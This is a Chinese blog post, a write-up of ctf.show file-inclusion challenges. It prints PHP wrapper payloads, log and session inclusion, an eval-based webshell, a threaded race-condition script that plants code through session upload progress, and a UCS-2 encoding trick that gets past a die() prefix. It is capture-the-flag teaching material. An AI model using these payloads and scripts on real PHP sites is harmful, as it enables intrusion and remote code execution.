<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>文件包含wp | css_0k的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="78.php伪协议无过滤 直接用php伪协议执行 1php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;  79.data协议 &#x2F;  input协议123?file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?&#x3D;eval($_POST[1])?&gt;    post：  1&#x3D;system(&quot;tac flag.php&quot;);  123?fil">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含wp">
<meta property="og:url" content="https://css0k.github.io/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/index.html">
<meta property="og:site_name" content="css_0k的博客">
<meta property="og:description" content="78.php伪协议无过滤 直接用php伪协议执行 1php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;  79.data协议 &#x2F;  input协议123?file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?&#x3D;eval($_POST[1])?&gt;    post：  1&#x3D;system(&quot;tac flag.php&quot;);  123?fil">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://css0k.github.io/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users/css/AppData/Roaming/Typora/typora-user-images/image-20220331234143049.png">
<meta property="og:image" content="https://css0k.github.io/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users/css/AppData/Roaming/Typora/typora-user-images/image-20220401131724678.png">
<meta property="og:image" content="https://css0k.github.io/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users/css/AppData/Roaming/Typora/typora-user-images/image-20220402204328548.png">
<meta property="og:image" content="https://css0k.github.io/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users/css/AppData/Roaming/Typora/typora-user-images/image-20220402204621247.png">
<meta property="article:published_time" content="2022-03-29T08:35:17.000Z">
<meta property="article:modified_time" content="2022-04-04T14:14:57.357Z">
<meta property="article:author" content="css_0k">
<meta property="article:tag" content="博客">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://css0k.github.io/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users/css/AppData/Roaming/Typora/typora-user-images/image-20220331234143049.png">
  
    <link rel="alternate" href="/atom.xml" title="css_0k的博客" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">css_0k的博客</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://css0k.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-文件包含wp" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/" class="article-date">
  <time datetime="2022-03-29T08:35:17.000Z" itemprop="datePublished">2022-03-29</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      文件包含wp
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h4 id="78-php伪协议"><a href="#78-php伪协议" class="headerlink" title="78.php伪协议"></a>78.php伪协议</h4><p>无过滤 直接用php伪协议执行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/convert.base64-encode/resource=</span></span><br></pre></td></tr></table></figure>

<h4 id="79-data协议-input协议"><a href="#79-data协议-input协议" class="headerlink" title="79.data协议 /  input协议"></a>79.data协议 /  input协议</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?file=data:<span class="comment">//text/plain,<span class="meta">&lt;?=</span>eval($_POST[1])<span class="meta">?&gt;</span></span></span><br><span class="line">    </span><br><span class="line">post：  <span class="number">1</span>=system(<span class="string">&quot;tac flag.php&quot;</span>);</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?file=Php:<span class="comment">//input</span></span><br><span class="line"></span><br><span class="line">post：<span class="meta">&lt;?php</span> system(<span class="string">&quot;tac flag.php&quot;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h4 id="80-81UA头传参-日志包含"><a href="#80-81UA头传参-日志包含" class="headerlink" title="80.81UA头传参   日志包含"></a>80.81UA头传参   日志包含</h4><p><img src="/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users\css\AppData\Roaming\Typora\typora-user-images\image-20220331234143049.png" alt="image-20220331234143049"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?file=/<span class="keyword">var</span>/log/nginx/access.log</span><br><span class="line">    </span><br><span class="line">POST: <span class="number">1</span>=system(<span class="string">&quot;ls&quot;</span>);</span><br></pre></td></tr></table></figure>

<h4 id="82-session包含"><a href="#82-session包含" class="headerlink" title="82.session包含"></a>82.session包含</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;php&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;data&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;:&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;.&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  <span class="keyword">include</span>(<span class="variable">$file</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">  highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>过滤了<code>.</code> 所以只能包含无后缀文件 -&gt; session包含</p>
<p>日志包含使用不了，我们使用session文件包含，先了解一些知识点，在php5.4之后php.ini开始有几个默认选项</p>
<blockquote>
<p>1.session.upload_progress.enabled = on<br>2.session.upload_progress.cleanup = on<br>3.session.upload_progress.prefix = “upload_progress_”<br>4.session.upload_progress.name = “PHP_SESSION_UPLOAD_PROGRESS”<br>5.session.use_strict_mode=off</p>
<p>第一个表示当浏览器向服务器上传一个文件时，php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中<br>第二个表示当文件上传结束后，php将会立即清空对应session文件中的内容<br>第三和第四个<code>prefix+name</code>将表示为session中的键名<br>第五个表示我们对Cookie中sessionID可控</p>
</blockquote>
<p>简而言之，我们可以利用<code>session.upload_progress</code>将木马写入session文件，然后包含这个session文件。不过前提是我们需要创建一个session文件，并且知道session文件的存放位置。因为<code>session.use_strict_mode=off</code>的关系，我们可以自定义sessionID</p>
<p><strong>linux系统中session文件一般的默认存储位置为 /tmp或/var/lib/php/session</strong></p>
<p>直接F12在cookie中添加一个session 生成 ，我们可以控制他的session名</p>
<p><img src="/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users\css\AppData\Roaming\Typora\typora-user-images\image-20220401131724678.png" alt="image-20220401131724678"></p>
<p>默认的话  session会存储为/tmp/sess_aaa文件</p>
<p>接下来就是要控制这个文件的内容 需要用到一个参数：<code>PHP_SESSION_UPLOAD_PROGRESS</code></p>
<p>能够推出  <code>PHP_SESSION_UPLOAD_PROGRESS</code> =&gt; “123” -&gt; /tmp/sess_aaa -&gt; 123  </p>
<p>由于session的性质  session会在脚本执行后自动删除 所以我们要用到条件竞争</p>
<blockquote>
<p>先存储文件，再判断是否合法，然后又删除。。。</p>
<p>首先将文件上传到服务器，然后检测文件后缀名，如果不符合条件，就删掉，典型的“引狼入室”</p>
<p>攻击：首先上传一个php文件</p>
<p>当然这个文件会被立马删掉，所以我们使用多线程并发的访问上传的文件，总会有一次在上传文件到删除文件这个时间段内访问到上传的php文件，一旦我们成功访问到了上传的文件，那么它就会向服务器写一个shell。</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/ivalue/article/details/81412494%E6%96%87%E7%AB%A0%E5%87%BA%E5%A4%84">https://blog.csdn.net/ivalue/article/details/81412494文章出处</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line">url = <span class="string">&#x27;http://b615acaf-c18b-4297-9af3-c178f18c1fa3.challenge.ctf.show/&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">write</span>(<span class="params">session</span>):</span></span><br><span class="line">    data = &#123;</span><br><span class="line">        <span class="string">&#x27;PHP_SESSION_UPLOAD_PROGRESS&#x27;</span>: <span class="string">&#x27;&lt;?php system(&quot;tac f*&quot;);?&gt;dotast&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        f = io.BytesIO(<span class="string">b&#x27;a&#x27;</span> * <span class="number">1024</span> * <span class="number">10</span>)</span><br><span class="line">        response = session.post(url,cookies=&#123;<span class="string">&#x27;PHPSESSID&#x27;</span>: <span class="string">&#x27;flag&#x27;</span>&#125;, data=data, files=&#123;<span class="string">&#x27;file&#x27;</span>: (<span class="string">&#x27;dota.txt&#x27;</span>, f)&#125;)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">read</span>(<span class="params">session</span>):</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        response = session.get(url+<span class="string">&#x27;?file=/tmp/sess_flag&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;dotast&#x27;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(response.text)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&#x27;retry&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    session = requests.session()</span><br><span class="line">    write = threading.Thread(target=write, args=(session,))</span><br><span class="line">    write.daemon = <span class="literal">True</span></span><br><span class="line">    write.start()</span><br><span class="line">    read(session)</span><br></pre></td></tr></table></figure>

<h4 id="87-文件写入包含"><a href="#87-文件写入包含" class="headerlink" title="87.文件写入包含"></a>87.文件写入包含</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">  <span class="variable">$content</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;content&#x27;</span>];</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;php&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;data&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;:&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  <span class="variable">$file</span> = str_replace(<span class="string">&quot;.&quot;</span>, <span class="string">&quot;???&quot;</span>, <span class="variable">$file</span>);</span><br><span class="line">  file_put_contents(urldecode(<span class="variable">$file</span>), <span class="string">&quot;&lt;?php die(&#x27;大佬别秀了&#x27;);?&gt;&quot;</span>.<span class="variable">$content</span>);</span><br><span class="line"></span><br><span class="line">  </span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">  highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>最显眼的就是<code>file_put_contents()</code>  在前题的过滤基础上，写入文件的时候将文件名进行url编码  并且将<?php die('大佬别秀了');?>与写入的内容进行拼接</p>
<p>直接用伪协议将内容rot13加密解密：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET:      ?file=php:<span class="comment">//filter/write=string.rot13/resource=1.php  </span></span><br><span class="line">         <span class="comment">#由于urldecode存在，所以需要两次url加密</span></span><br><span class="line">POST:    content=<span class="meta">&lt;?php</span> system(<span class="string">&quot;tac fla*.php&quot;</span>);<span class="meta">?&gt;</span>   <span class="comment">#需要rot13加密</span></span><br></pre></td></tr></table></figure>

<p>写入之后 直接访问1.php  拿到flag</p>
<h4 id="88-data协议base64加密内容"><a href="#88-data协议base64加密内容" class="headerlink" title="88.data协议base64加密内容"></a>88.data协议base64加密内容</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">&quot;/php|\~|\!|\@|\#|\\$|\%|\^|\&amp;|\*|\(|\)|\-|\_|\+|\=|\./i&quot;</span>, <span class="variable">$file</span>))&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;error&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">include</span>(<span class="variable">$file</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">  highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>过滤了php但是没有过滤data  所以可以用data协议打一下   并需要用base64加密一下</p>
<p>然后因为正则匹配中有/和=   所以base64加密后去掉这两个符号  事实证明去掉之后并没有影响</p>
<p>先ls  发现flag在fl0g.php中  直接tac   拿到fllag</p>
<h4 id="116-抓包看底层"><a href="#116-抓包看底层" class="headerlink" title="116.抓包看底层"></a>116.抓包看底层</h4><p>抓包查看路径  可以看到源码</p>
<p><img src="/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users\css\AppData\Roaming\Typora\typora-user-images\image-20220402204328548.png" alt="image-20220402204328548"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$x</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/http|https|data|input|rot13|base64|string|log|sess/i&#x27;</span>,<span class="variable">$x</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;too young too simple sometimes naive!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>])?<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>]:<span class="string">&quot;5.mp4&quot;</span>;</span><br><span class="line">filter(<span class="variable">$file</span>);</span><br><span class="line">header(<span class="string">&#x27;Content-Type: video/mp4&#x27;</span>);</span><br><span class="line">header(<span class="string">&quot;Content-Length: <span class="subst">$file</span>&quot;</span>);</span><br><span class="line">readfile(<span class="variable">$file</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>直接包含flag.php  便能看到flag</p>
<p><img src="/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/Users\css\AppData\Roaming\Typora\typora-user-images\image-20220402204621247.png" alt="image-20220402204621247"></p>
<h4 id="117-奇怪编码绕过"><a href="#117-奇怪编码绕过" class="headerlink" title="117.奇怪编码绕过"></a>117.奇怪编码绕过</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params"><span class="variable">$x</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/http|https|utf|zlib|data|input|rot13|base64|string|log|sess/i&#x27;</span>,<span class="variable">$x</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;too young too simple sometimes naive!&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$file</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="variable">$contents</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;contents&#x27;</span>];</span><br><span class="line">filter(<span class="variable">$file</span>);</span><br><span class="line">file_put_contents(<span class="variable">$file</span>, <span class="string">&quot;&lt;?php die();?&gt;&quot;</span>.<span class="variable">$contents</span>); </span><br></pre></td></tr></table></figure>

<p>这题和前面的有点类似，也是绕过contents前面的死亡代码，只是把一些可利用的协议和编码给ban了，但还可以利用其它编码器进行绕过</p>
<blockquote>
<p>convert.iconv.：一种过滤器，和使用iconv()函数处理流数据有等同作用<br><code>iconv ( string $in_charset , string $out_charset , string $str )</code>：将字符串<code>$str</code>从<code>in_charset</code>编码转换到<code>$out_charset</code><br>这里引入usc-2的概念，作用是对目标字符串每两位进行一反转，值得注意的是，因为是两位所以字符串需要保持在偶数位上</p>
</blockquote>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">PHP</span><br><span class="line"><span class="variable">$result</span> = iconv(<span class="string">&quot;UCS-2LE&quot;</span>,<span class="string">&quot;UCS-2BE&quot;</span>, <span class="string">&#x27;&lt;?php @eval($_POST[dotast]);?&gt;&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;经过一次反转:&quot;</span>.<span class="variable">$result</span>.<span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;经过第二次反转:&quot;</span>.iconv(<span class="string">&quot;UCS-2LE&quot;</span>,<span class="string">&quot;UCS-2BE&quot;</span>, <span class="variable">$result</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">//输出结果如下：</span></span><br><span class="line"><span class="comment">//经过一次反转:?&lt;hp pe@av(l_$OPTSd[tosa]t;)&gt;?</span></span><br><span class="line"><span class="comment">//经过第二次反转:<span class="meta">&lt;?php</span> @eval($_POST[dotast]);<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>可以看到，经过两次反转之后代码又组装回来，思路就是用经过一次反转后的webshell和死亡代码<code>&lt;?php die();?&gt;</code>一起组合之后，经过第二次反转我们的webshell就恢复正常了，而死亡代码会被反转打乱不能执行<br>所以payload也就出来了，把前面的脚本改一下即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">PYTHON</span><br><span class="line"><span class="comment">#-- coding:UTF-8 --</span></span><br><span class="line"><span class="comment"># Author:dota_st</span></span><br><span class="line"><span class="comment"># Date:2021/2/21 12:29</span></span><br><span class="line"><span class="comment"># blog: www.wlhhlc.top</span></span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://8a412388-9727-4ea0-8b0d-1f144f2d1a87.chall.ctf.show:8080/&quot;</span></span><br><span class="line">get_data = <span class="string">&quot;php://filter/convert.iconv.UCS-2LE.UCS-2BE/resource=dotast.php&quot;</span></span><br><span class="line">get_url = url + <span class="string">&quot;?file=&quot;</span> + get_data</span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&#x27;contents&#x27;</span>: <span class="string">&#x27;?&lt;hp pe@av(l_$OPTSd[tosa]t;)&gt;?&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">res = requests.post(url=get_url, data=data)</span><br><span class="line">shell_url = url + <span class="string">&quot;dotast.php&quot;</span></span><br><span class="line">test = requests.get(shell_url)</span><br><span class="line"><span class="keyword">if</span>(test.status_code == <span class="number">200</span>):</span><br><span class="line">    <span class="keyword">print</span>(<span class="string">&quot;[*]getshell成功&quot;</span>)</span><br><span class="line">    shell_data = &#123;</span><br><span class="line">        <span class="string">&#x27;dotast&#x27;</span>: <span class="string">&#x27;system(&quot;cat flag.php&quot;);&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">    result = requests.post(url=shell_url, data=shell_data)</span><br><span class="line">    <span class="keyword">print</span>(result.text)</span><br></pre></td></tr></table></figure>

<p>运行后得到flag</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://css0k.github.io/2022/03/29/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABwp/" data-id="cl2w3h1ij000tagw507dv15nl" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/04/01/nisactf2022/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          nisactf2022
        
      </div>
    </a>
  
  
    <a href="/2022/03/26/%E6%9A%97%E7%BD%91/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">暗网</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc%E5%9B%BE%E7%89%87/" rel="tag">misc图片</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%9B%BE%E7%89%87%E9%9A%90%E5%86%99/" rel="tag">图片隐写</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/misc%E5%9B%BE%E7%89%87/" style="font-size: 10px;">misc图片</a> <a href="/tags/php/" style="font-size: 10px;">php</a> <a href="/tags/%E5%9B%BE%E7%89%87%E9%9A%90%E5%86%99/" style="font-size: 10px;">图片隐写</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">四月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">三月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">二月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">一月 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/04/12/%E9%9A%90%E5%86%99%E9%A2%98%E6%80%9D%E8%B7%AF/">图片题思路</a>
          </li>
        
          <li>
            <a href="/2022/04/09/%E5%9B%BE%E7%89%87%E9%9A%90%E5%86%99%E7%9F%A5%E8%AF%86/">图片隐写知识</a>
          </li>
        
          <li>
            <a href="/2022/04/05/1/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/04/04/php%E7%89%B9%E6%80%A7/">php特性</a>
          </li>
        
          <li>
            <a href="/2022/04/04/sqli-labs/">sqli-labs</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 css_0k<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>